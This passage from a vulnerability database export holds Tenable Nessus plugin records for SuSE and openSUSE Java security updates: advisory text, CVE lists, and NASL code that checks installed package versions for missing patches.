script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5343.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5344.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5345.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5354.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5360.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5960.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-demo-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-src-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr9-2.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:18", "description": "This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. (CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. (CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. (CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. (CVE-2008-5354)\n\nThis vulnerability cannot be exploited by an applet or Java Web Start\napplication.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\n\nReferences can be found on :\n\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : IBM Java5 JRE and SDK (YOU Patch Number 12336)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12336.NASL", "href": "https://www.tenable.com/plugins/nessus/41268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41268);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java5 JRE and SDK (YOU Patch Number 12336)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. (CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. (CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. (CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. (CVE-2008-5354)\n\nThis vulnerability cannot be exploited by an applet or Java Web Start\napplication.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\n\nReferences can be found on :\n\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5343.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5344.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5345.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5354.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5360.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12336.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava5-JRE-1.5.0-0.57\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava5-SDK-1.5.0-0.57\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"IBMJava5-JRE-1.5.0-0.56\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"IBMJava5-SDK-1.5.0-0.56\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:10", "description": "The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-01-07T00:00:00", "title": "openSUSE 10 Security Update : java-1_6_0-sun (java-1_6_0-sun-5876)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-01-07T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun-debuginfo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun", "cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_JAVA-1_6_0-SUN-5876.NASL", "href": "https://www.tenable.com/plugins/nessus/35306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-5876.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35306);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE 10 Security Update : java-1_6_0-sun (java-1_6_0-sun-5876)\");\n script_summary(english:\"Check for the java-1_6_0-sun-5876 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n 